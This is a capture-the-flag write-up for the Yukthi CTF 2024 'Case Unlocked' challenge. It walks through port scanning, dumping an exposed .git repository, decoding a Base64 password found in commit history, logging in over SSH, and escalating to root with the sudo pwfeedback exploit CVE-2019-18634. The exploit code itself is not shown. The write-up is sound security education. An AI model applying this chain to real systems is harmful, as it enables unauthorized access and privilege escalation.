Case Unlocked: Yukthi CTF 2024 Prelims


Case Unlocked is a web-based challenge in the Yukthi CTF 2024 prelims, designed to immerse participants in a scenario of digital exploration and exploitation. The challenge tests participants' skills in identifying and leveraging web vulnerabilities, with a journey that starts from discovering sensitive information through exposed .git directories, leading up to gaining unauthorized access to a system and escalating privileges using a known vulnerability.

Skills Learned

  • Effective methods for exploring and exploiting web endpoints
  • Techniques for uncovering hidden or obscured login credentials
  • Strategies for privilege escalation on Linux systems


1. Initial Reconnaissance

The first step involved scanning the network for open ports. Using the command nmap -p-, we performed a comprehensive scan.

nmap -p-

This preliminary scan is essential as it helps to identify potential entry points on the target machine, revealing which ports are listening and potentially vulnerable to further exploitation.
Open Ports Image

2. Discovering Port 80

The scan results showed that port 80 was open, indicating a web service was running. Accessing this web service through a browser provided a pivotal clue for further actions.
Web Service Access Image
Upon accessing the webpage, I encountered an interactive game embedded within the site, providing an intriguing element to explore further

3. Endpoint Exploration

Utilizing the Nikto tool, a comprehensive web server scanner that checks for dangerous files, outdated server software, and other problems, I discovered some interesting endpoints:

 nikto -h http://localhost:34829

Endpoint Exploration Image

These included admin login and .git pages. Navigating to the admin page redirected to a login page, but without known credentials:
Login Endpoint Image

The discovery of a publicly accessible .git directory was crucial. It is a common security oversight to leave git directories accessible on production servers, which can expose sensitive information.
Git Tools Usage Image

Using GitTools (, I cloned the repository found on the server, allowing access to the development history and potentially sensitive data.

4. Unearthing Credentials
cd GitTools

After cloning the git repository, the command git log | grep "commit" | cut -d " " -f2 | xargs git show was used to extract and decode commits. This command sequence is useful for examining commit histories to find potentially leaked sensitive information.

git log | grep "commit" | cut -d " " -f2 | xargs git show

The credentials were found encoded in Base64 within the commit messages: passwd=VDdpM19pM181ZXJlY3RfN2E1NXcwcmQ=, which decodes to T7i3_i3_5erect_7a55w0rd.


5. Securing the Flag

With the decoded credentials in hand, I used them to log in through the login.html page. Upon successful authentication, It was redirected to the /secret.php page, where the first flag was revealed.

Secret Page Flag Image

Challenge 2: Loophole Discovery

After completing the initial challenge, I resumed with another round of port scanning to uncover further points of attack. This scan highlighted an active SSH service on the target.

1. Further Reconnaissance

A subsequent port scan revealed that SSH (port 22) was open, providing an ideal vector for utilizing the credentials discovered earlier. This allowed for direct access to the system's shell.

ssh tetris@IPaddress

SSH Access Image

2. Identifying Vulnerable Sudo Version

Once inside the shell, I employed various strategies to escalate privileges. Noticing the sudo version was 1.8.21, an older and known exploitable version, I identified a potential avenue for attack. The presence of password feedback (asterisks when typing the password) confirmed that pwfeedback was enabled, a feature vulnerable to specific exploits.

sudo --version

Sudo Version Check: Sudo Version Image

Research on Google led me to an exploit in the Exploit Database that could leverage this vulnerability (CVE-2019-18634).

3. Gaining Root Access

I cloned the exploit script from GitHub:

git clone
cd CVE-2019-18634

Root Access Image
Root Access Image

Running the ./ script from the cloned repository exploited the pwfeedback buffer overflow vulnerability, successfully granting root access. This allowed me to locate a critical document inside /root/locker/.

Leave a Comment

Realted Blog >>

DALL·E 2024-04-02 10.28.27 - A visually striking, colorful background that symbolizes unlocking or opening, featuring vibrant gradients and dynamic shapes
Case 118 Unlocked: A Blockchain OSINT Challenge Guide
Introduction Case 118 Unlocked is a blockchain-based OSINT challenge that tests your detective skills...
Pickle Portal - Yukthi CTF Prelims 2024 Write-up
Introduction The Pickle Portal Challenge offers an engaging test of Python and Linux skills through the...
DALL·E 2024-04-11 12.16.26 - Create an image with the title 'Mystery 013' placed in the very center, in bold and prominent lettering
Mastering the Mystery 013 - Yukthi CTF 2024 Prelims
Introduction "Mystery 013" is a digital forensics challenge in the Yukthi CTF 2024 prelims,...
1 2
Scroll to Top